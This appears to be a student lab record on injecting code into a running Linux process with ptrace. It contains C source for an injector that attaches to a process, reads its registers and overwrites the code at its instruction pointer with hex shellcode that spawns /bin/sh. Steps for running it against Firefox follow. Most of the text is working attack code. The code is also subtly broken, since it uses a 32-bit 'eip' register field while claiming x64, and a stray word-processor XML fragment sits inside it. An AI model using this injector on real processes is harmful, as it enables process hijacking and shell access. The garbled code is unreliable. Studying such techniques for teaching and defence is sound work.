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 12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code injection in the running process using ptrace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perform code injection in the running process using ptrace.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ALOGORITHM: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Create a program that takes as input a PID of the running process and uses PTRACE_ATTACH to attach to a running process. The callee is stopped and the caller now is in control.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After attaching get the registers of the running process using PTRACE_GETREGS. This will also return the instruction pointer, so know where the callee is in terms of instruction execution.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Inject the shellcode at the point the RIP (instruction pointer) is. So inject_code method, use PTRACE_POKETEXT call which takes as input PID of the callee, target location (will be RIP of callee process), source (shellcode)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&lt;stdio.h&gt;//C standard input output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&lt;stdlib.h&gt;//C Standard General Utilities Library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&lt;string.h&gt;//C string lib header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&lt;unistd.h&gt;//standard symbolic constants and types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&lt;sys/wait.h&gt;//declarations for waiting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&lt;sys/ptrace.h&gt;//gives access to ptrace functionality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include &lt;sys/user.h&gt;//gives ref to regs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//The shellcode that calls /bin/sh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shellcode[]={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"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97"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"\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"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};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//header for our program.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header()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printf("----Memory bytecode injector-----\n");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//main program notice we take command line options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argc,char**argv)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i,size,pid=0;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user_regs_struct reg;//struct that gives access to registers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                    //note that this regs will be in x64 for me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  <w:tab/>
        <w:t xml:space="preserve">//unless your using 32bit then eip,eax,edx etc...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char*buff;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header();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//we get the command line options and assign them appropriately!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pid=atoi(argv[1]);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size=sizeof(shellcode);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//allocate a char size memory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buff=(char*)malloc(size);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//fill the buff memory with 0s upto size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memset(buff,0x0,size);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//copy shellcode from source to destination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memcpy(buff,shellcode,sizeof(shellcode));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//attach process of pid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ptrace(PTRACE_ATTACH,pid,0,0);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//wait for child to change state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wait((int*)0);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//get process pid registers i.e Copy the process pid's general-purpose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//or floating-point registers,respectively,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//to the address reg in the tracer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ptrace(PTRACE_GETREGS,pid,0,&amp;reg);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printf("Writing EIP 0x%x, process %d\n",reg.eip,pid);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//Copy the word data to the address buff in the process's memory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for(i=0;i&lt;size;i++){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ptrace(PTRACE_POKETEXT,pid,reg.eip+i,*(int*)(buff+i));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//detach from the process and free buff memory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ptrace(PTRACE_DETACH,pid,0,0);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free(buff);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firefox on linux terminal then inject the code.... the initial program will crush but the shell will run.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gcc -o injector injector.c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the pid of the victim process ps -e|grep firefox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terminal and start injector give the process id for the program "./injector 4567" where 4567 is the pid of the victim.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kill -9 4567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Hence to perform code injection in the running process using ptrace was implemented successfully.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